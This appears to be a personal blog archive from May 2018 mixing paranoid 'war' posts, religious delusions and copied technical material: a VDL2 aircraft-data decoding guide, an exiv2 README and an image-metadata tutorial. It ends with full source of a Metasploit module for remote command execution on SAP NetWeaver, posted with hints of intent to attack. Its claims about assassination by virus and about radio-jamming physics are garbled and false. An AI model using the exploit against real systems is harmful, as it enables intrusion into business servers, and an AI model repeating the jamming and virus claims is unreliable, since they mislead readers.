Good morning !welcome back to war! Thursday, 08.25 am! I found "funny" the MI6 reccomendation on the Embassy site, saying to be careful with terrorism ( ...basic shit) and gastrointestinal diseases at Portugal!!!! (????) I just realized how stupid I am, that didn't immediately recognize the mice trap!!!! ...so let me explain to you...The enteroviruses ( are a family of viruses that usually enter the body by infecting the gastrointestinal * tract. ...one of them is ...coxsackievirus b that provokes myocarditis (heart inflammation) ....which provokes sudden heart arrest, from 2 to 10 hours...and the virus is undetectable because its replication is based on necrosis (the virus kills, eats, the virus) ...therefore...by a simple ingestion of the virus in food, what was a gastrointestinal common shit...will be the sudden death of the artist! And..."be careful while travelling to Portugal in holidays"
Thursday, May 17, 2018
Wednesday, May 16, 2018
..back to war! So, about the subject "flight mode" counter attack...let's just begin by defining that air traffic use a different TCP/IP protocol like VDL 2...this is something they don't except...if our communications are made in an obsolete (we might say it like this) SDR receiver... they will stay without no way, as their jammers are looking for typical Bluetooth inside the wireless network, or RF microwave...of jamming this system...here's how to install
The VDL2 (for "VHF Data Link mode 2") mode permits automatic transmissions between planes and ground stations, with an exchange of different pieces of information (and especially positions) through AVLC frames (I, UI, RR, XID...) very close to Packet frames. It is a short distance (400 km maximum) service proposed through a network of VHF ground stations (on 136.975 MHz mainly but also 136.875 MHz in Europe). It gradually replaces the ACARS mode.
- The simplest way to decode this mode is to directly demodulate 8PSK frames by MultiPSK, with a SDR receiver (FUNcube Dongle, for example) connected to MultiPSK and the SDR interface started (on the Configuration screen). Adjust the SDR frequency on 136963 kHz and the waterfall frequency on 12 kHz (making it 136.975 MHz).
Or adjust the SDR frequency on 136863 kHz and the waterfall frequency on 12 kHz (making it 136.875 MHz).
The I/Q PSK demodulation will be done by Multipsk, so as the decoding.
The I/Q PSK demodulation will be done by Multipsk, so as the decoding.
- However, a standard USB receiver can be used (both solutions are equivalent from a performance point of view). In this case, the reception central frequency must be shifted by 12 KHz, i.e the frequency on the USB receiver must be adjusted to 136.963 MHz (136963 KHz instead 136975 KHz). Of course, the SDR interface on Multipsk must not be started.
The frequency must be very precisely adjusted (tolerance: +/50 Hz).
"end quote"
As of July 2016 the following 4 frequencies have been found to be active in Europe:
136.725 MHz dedicated to ARINC
136.775 MHz dedicated to SITA
136.875 MHz dedicated to SITA
136.975 MHz ARINC shared with SITA
Connect the dongle to MultiPSK
RTL dongle specific settings
Setting the VDL2 Mode
Setting the frequency
Coarse frequency adjustment
Fine frequency adjustment
Connecting MultiPSK to Plane Plotter
tactical jammers position ..drones...
welcome back to war! So, dear friends, what's the important aspects to know about their projectiles send by cannons to disrupt communications ? 1. they send the jammers trough a tactical method which is "two coherent waves traveling along two different paths to the same point will interfere destructively" this means we have to detect two positions, inside their target area, that are sending radio signals, trough projectiles. 2. Do not forget, that this jammers are deployed by drones, and hot ballons 3 and most important, while we are under attack, put all electronic wireless under "flight mode"
ok, before we go to the "flight mode" counter attack..just to refer a detail, on this communication disruption; so, we are emitting a coherent radio frequency (between 20 and 2020 mgz) on two different locations, destiny for the same target, deployed by a drone. To be effective the disruption, based on Physics, is that between the two jamming signals, must have half distance of the wavelength, between them. So if , we deploy one, at 20 miles (for example), the other one, must be emitting at 10 miles distance
ok, before we go to the "flight mode" counter attack..just to refer a detail, on this communication disruption; so, we are emitting a coherent radio frequency (between 20 and 2020 mgz) on two different locations, destiny for the same target, deployed by a drone. To be effective the disruption, based on Physics, is that between the two jamming signals, must have half distance of the wavelength, between them. So if , we deploy one, at 20 miles (for example), the other one, must be emitting at 10 miles distance
Tuesday, May 15, 2018
CODE IS ...
....A simple wrapper around exiv2...
A simple wrapper around the C++ Exiv2 libary for reading and writing image metadata.
Requires that the exiv2 C++ library is installed.
Usage
gem install exiv2
if you get errors with header could not be found below:
exiv2.cpp:1:10: fatal error: 'exiv2/image.hpp' file not found
#include "exiv2/image.hpp"
please explicitly declare the header path
gem install exiv2 -- --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"
on OSX with Homebrew's exiv2, the
EXIV2_PREFIX can be set:export EXIV2_PREFIX=$(brew --prefix exiv2)
If you get this error while trying to install as part of a bundle install, you can set these paths using:
bundle config build.exiv2 --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"
If you are on new version of Command Line Tool (that is newer than 6.2, and bump into following error:
/Library/Developer/CommandLineTools/usr/bin/../include/c++/v1/iterator:341:10: fatal error: '__debug' file not found
#include <__debug>
You can follow the quick hack by touching a new file
/Library/Developer/CommandLineTools/usr/include/c++/v1/__debug with content:#ifndef _LIBCPP_ASSERT
#define _LIBCPP_ASSERT(...) ((void)0)
#endif
Once everything is successfully installed, you can give it a go:
require 'exiv2'
image = Exiv2::ImageFactory.open("image.jpg")
image.read_metadata
image.iptc_data.each do |key, value|
puts "#{key} = #{value}\n"
end
image.exif_data.each { ... }
image.xmp_data.each { ... }
iptc_data_hash = image.iptc_data.to_hash
xmp_data_hash = image.xmp_data.to_hash
image.exif_data.delete("Exif.Image.Software")
image.iptc_data.delete_all("Iptc.Application2.Keywords")
image.iptc_data["Iptc.Application2.Caption"] = "A New Caption"
image.iptc_data.add("Iptc.Application2.Keywords", "fishy")
image.write_metadata
welcome back...to war! "Not that I'm currently cruising for jobs with British intelligence or anything, but I happened upon (via Hacker News) this current coding challenge posted to the MI5 careers page...."
Prerequisites: Assuming you've already downloaded and installed Python, you should do two things. One: spend 10 minutes doing this "Hello, World" Python for non-programmers tutorial. Two: spend another five minutes doing this tutorial on using Python modules.
0.0) Install Pillow
The active version of PIL is actually known as Pillow, so this is what we need to install. You should do this with the Python package manager pip, which is covered in the second prerequisite tutorial above. Just:
pip install pillow
Now, create a new Python script in whatever text editor you like. I'm using Sublime Text, which is great. I called my script metaread.py.
1.0) Create an Image object
First thing we're going to do is actually bring in the Pillow module we installed, which is the first line below. Next, we need to create an object representation of our MI5 image, puzzle.png. This exposes the image and all of the things we can do with it via the Pillow module to our Python script. To see some more of these capabilities, check out Hack This: Edit an Image in Python.
from PIL import Image image = Image.open("water.png")
2.0) Extract the Exif data
Not all image formats contain Exif data. Mostly just JPGs. Which is fine because that's most pictures. The MI5's image is actually a .PNG file, which we'll have to handle somewhat differently. Let's do a quick JPG though.
There's really nothing to it. I create the image object as above then call the _getexif()function on it. In return, I get a dictionary data structure full of metadata.
The dictionary consists of tag-value pairs, which we can extract and view using a for-loop, like this. Note that I had to import some extra stuff at the top:
from PIL import Image from PIL.ExifTags import TAGS, GPSTAGS image = Image.open("gpsample.jpg") print(image) info = image._getexif() for tag, value in info.items(): key = TAGS.get(tag, tag) print(key + " " + str(value))
So, that just outputs all of the Exif data contained within a given image as a series of entries. It's hardly guaranteed to be the same for every image. I had to search online for a sample image containing GPS metadata because I got tired of scanning through everything on my computer trying to find an example (though it wouldn't be too hard to write a script that could comb through a file of images and automatically pull out those that do include it). In any case, you can find the same image here.
A sampling of the output:
GPSInfo {0: '\x00\x00\x02\x02', 1: u'S', 2: ((33, 1), (51, 1), (2191, 100)), 3: u'E', 4: ((151, 1), (13, 1), (1173, 100)), 5: '\x00', 6: (0, 1)} ISOSpeedRatings 100 ResolutionUnit 2 WhiteBalance 0 GainControl 0 BrightnessValue (100, 10)
2.1) Extract non-Exif data
Again, PNGs don't come with Exif data.
Don't panic. Just because it's not in Exif format doesn't mean that puzzle.png's metadata is all that more difficult to access.
It so happens that when an image is loaded per step 1.0, the PIL module will automatically load up a dictionary with whatever metadata it can id. We can barf it all out to the screen with a simple print statement:
print (image.info)
Or we can loop through it as in 2.0 as such:
for tag, value in info.items(): key = TAGS.get(tag, tag) print(key + " " + str(value))
Problem solved?
So, at this point I need to confess that this .info method is not actually returning all of the metadata from puzzle.png, and I don't quite know why. In addition to regular old Photoshop and the ExifRead Python tool mentioned above, I also tried four different online metadata extraction tools and only one was able to return a complete listing: Jeffrey Friedl's Image Metadata Viewer. Said viewer is based on a command-line tool called ExifTool, which I downloaded and ran. It too worked.
But I promised Python and Python we shall write. It's actually pretty easy to run a command-line program from within Python, but you'll still have to download the actual command line program, which is available here. Now, we can run this script on our image file, and the ExifTool will output the result via Python to the screen. Try it.
import os os.system('exiftool -h puzzle.png')
See the clue?
I don't know why it was so difficult to pull metadata from this file. It may have something to do with how metadata in PNG files is laid out. Within the file, metadata is kept in data structures called chunks. Chunks are given weird coded names that define, among other things, whether they should be considered "critical" or not. Critical chunks include actual image data, bit depth, and color palette. Not-critical chunks offer histograms, gamma values, default background colors, and, finally, text. There are three different types of text chunks all with a standard dictionary entry format. Each text entry has a name or title, and then some associated text. They can be user-defined, but there are some text field types that come predefined, such as "comment." Which in our MI5 file contains this:
https://motherboard.vice.com/en_us/article/aekn58/hack-this-extra-image-metadata-using-python
Monday, May 14, 2018
back to war! so...who wants completely secure communications, and probable tv broadcast jammers ?
http://www.goscas.com/china-high_power_ka_band_point_to_point_microwave_antennas_dual_polarization-5650098.html
http://www.goscas.com/china-high_power_ka_band_point_to_point_microwave_antennas_dual_polarization-5650098.html
Maybe I am semi Goddess ...I keep on saying to invisible Jesus my Lord, you better have a very special place for me in Paradise, since I'm being used by God, for some task and purpose I don't know what it is, and I'm not being payed!!!!! Maybe Jesus got my Mother pregnant, when she was for 3 years trying, picked my Mother specially for a truly Queen taste. And keep me here, using my rage, on a world that should have made me very very rich...keep me here poor and prisoner. Maybe Jesus architect this story, by making me, not a top model, but the most loved girl in the world...for a sexy look, that I had for years, (and still have) that its universal ; a sexy look, that Jesus carefully studied on Men's preferences....My natural talent for espionage...My gigant megalomania views. ...My realism ...my pure heart...my good intentions...and horrible revenges ....as we spoken , the phone ringed ...my Mother telling (us) the old men has a lottery in his pocket for me...didn't said how much or when he would give me...
we live in times, where computers are nano sized and can penetrate your skin. God has a task for me, for all my friends gather at my house. Jesus said.."if I told you , your actions in the future, you would change them" He downloaded me, tetra bytes of information...Jesus said to me what was our part, how the "war" will end...but He keeps the lottery ticket on His pocket, not saying how much and when He will give it to us.
we live in times, where computers are nano sized and can penetrate your skin. God has a task for me, for all my friends gather at my house. Jesus said.."if I told you , your actions in the future, you would change them" He downloaded me, tetra bytes of information...Jesus said to me what was our part, how the "war" will end...but He keeps the lottery ticket on His pocket, not saying how much and when He will give it to us.
Sunday, May 13, 2018
Some people # just seem to enjoy hacking SAP :) ...back to war! ...just wait for maintenance....
require 'msf/core'class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::CmdStagerVBS include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution', 'Description' => %q{ This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP SOAP RFC Service, to execute remote commands. This module needs SAP credentials with privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested successfully on Windows 2008 64 bits and Linux 64 bits platforms. }, 'References' => [ ], 'DisclosureDate' => 'May 8 2012', 'Platform' => ['win', 'unix'], 'Targets' => [ [ 'Linux', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' #'Payload' => #{ #'DisableNops' => true, #'Space' => 232, #'Compat' => #{ #'PayloadType' => 'cmd', #'RequiredCmd' => 'perl ruby', #} #} } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64, 'Platform' => 'win' } ] ], 'DefaultTarget' => 0, 'Privileged' => false, 'Author' => [ 'nmonkee' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(8000), OptString.new('CLIENT', [true, 'SAP Client', '001']), OptString.new('USERNAME', [true, 'Username', 'SAP*']), OptString.new('PASSWORD', [true, 'Password', '06071992']) ], self.class) register_advanced_options( [ OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]), ], self.class) end def send_soap_request(data) res = send_request_cgi({ 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], 'ctype' => 'text/xml; charset=UTF-8', 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', }, 'vars_get' => { 'sap-client' => datastore['CLIENT'], 'sap-language' => 'EN' } }) return res end def build_soap_request(command, sap_command, sap_os) data = "\r\n" data << "http://www.w3.org/2001/XMLSchema data << "\r\n" data << "http://schemas.xmlsoap.org/soap/encoding/ data << "#{command} \r\n" data << "#{sap_command} \r\n" data << "#{sap_os} \r\n" data << " data << " data << " data << " return data end def check data = rand_text_alphanumeric(4 + rand(4)) res = send_soap_request(data) if res and res.code == 500 and res.body =~ /faultstring/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit if target.name =~ /Windows/ linemax = datastore['PAYLOAD_SPLIT'] vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250 print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request") execute_cmdstager({ :delay => 0.35, :linemax => linemax }) elsif target.name =~ /Linux/ file = rand_text_alphanumeric(5) stage_one = create_unix_payload(1,file) print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...") res = send_soap_request(stage_one) if res and res.code == 200 and res.body =~ /External program terminated/ print_good("#{rhost}:#{rport} - Payload dump was successful") else fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed") end stage_two = create_unix_payload(2,file) print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...") send_soap_request(stage_two) end end def create_unix_payload(stage, file) command = "" if target.name =~ /Linux/ if stage == 1 my_payload = payload.encoded.gsub(" ","\t") my_payload.gsub!("&","&") my_payload.gsub!("<","<") command = "-o /tmp/" + file + " -n pwnie" + "\n!" command << my_payload command << "\n" elsif stage == 2 command = "-ic /tmp/" + file end end return build_soap_request(command.to_s, "DBMCLI", "ANYOS") end def execute_command(cmd, opts) command = cmd.gsub(/&/, "&") command.gsub!(/%TEMP%\\/, "") data = build_soap_request("&#{command}", "LIST_DB2DUMP", "Windows NT") begin res = send_soap_request(data) if res and res.code == 200 return else if res and res.body =~ /faultstring/ error = res.body.scan(%r{(.*?) }) 0.upto(error.length-1) do |i| vprint_error("#{rhost}:#{rport} - Error #{error[i]}") end end print_status("#{res.code}\n#{res.body}") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect") end endend
Subscribe to:
Posts (Atom)
